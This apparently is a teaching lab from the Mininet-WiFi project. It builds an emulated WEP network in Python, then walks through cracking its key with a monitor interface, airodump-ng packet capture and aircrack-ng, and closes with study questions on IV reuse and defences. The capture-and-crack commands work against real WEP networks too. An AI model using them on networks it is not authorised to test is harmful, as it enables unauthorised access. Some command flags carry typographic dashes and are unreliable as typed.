Cracking WEP Wi-Fi Encryption

Note

In this short demo you will learn on how to crack a WEP key:

Requirements:

• Mininet-WiFi - https://github.com/intrig-unicamp/mininet-wifi

• airodump-ng

The VM available at the Mininet-WiFi’s source code repository already has all the requirements satisfied.

First of all you need to identify the network topology that will be generated by the code below:

#!/usr/bin/python

'''@author: Ramon Fontes
   @email: ramon.fontes@imd.ufrn.br'''

from mininet.log import setLogLevel, info
from mn_wifi.cli import CLI
from mn_wifi.net import Mininet_wifi


def topology():
    "Create a network."
    net = Mininet_wifi()

    info("*** Creating nodes\n")
    sta1 = net.addStation('sta1', passwd='1234567891a', encrypt='wep')
    sta2 = net.addStation('sta2', passwd='123456789a', encrypt='wep')
    sta3 = net.addStation('sta3', passwd='123456789a', encrypt='wep')
    ap1 = net.addAccessPoint('ap1', ssid="simplewifi", mode="g", channel="1",
                             passwd='123456789a', encrypt='wep',
                             failMode="standalone", datapath='user')

    info("*** Configuring wifi nodes\n")
    net.configureWifiNodes()

    info("*** Associating Stations\n")
    net.addLink(sta1, ap1)
    net.addLink(sta2, ap1)
    net.addLink(sta3, ap1)

    info("*** Starting network\n")
    net.build()
    ap1.start([])

    info("*** Running CLI\n")
    CLI(net)

    info("*** Stopping network\n")
    net.stop()


if __name__ == '__main__':
    setLogLevel('info')
    topology()

So considering that the filename is wep.py you have to run it as below:

~$ sudo python wep.py

and then you have to create a monitor interface called mon0 for sta1.

mininet-wifi> sta1 iw dev sta1-wlan0 interface add mon0 type monitor
mininet-wifi> sta1 ifconfig mon0 up

Now you have to open a xterm for sta1

mininet-wifi> xterm sta1

Then we will start using the dump command to grab packets from other wireless devices, and the software will be able to make calculations and comparisons among the data to break the insecure WEP protocol. Enter the following command from sta1’s terminal:

# airodump-ng mon0

Now it is time to tell your wireless interface to start storing captured wireless data based on the network of your choosing. Remember to plug in three key pieces of information from the previous output into the following command:

# airodump-ng –w simplewifi –c 1 –-bssid 02:00:00:00:03:00 mon0

Last but not least, you are going to need to do the most important step of the process by actually using the captured data from the WEP device. Issue the following command:

# aircrack-ng simplewifi-01.cap

If all goes according to plan, you should be able to break the WEP system. However, if the command fails, you will want to wait until your wireless card captures more data. Give it time to capture 15,000 packets and then try again.

Question

• Q1. For a 24-bit IV, there is a 50% probability the same IV will repeat after 5,000 packets. Why?

• Q2. Is there any way to be protected from this WEP key attack?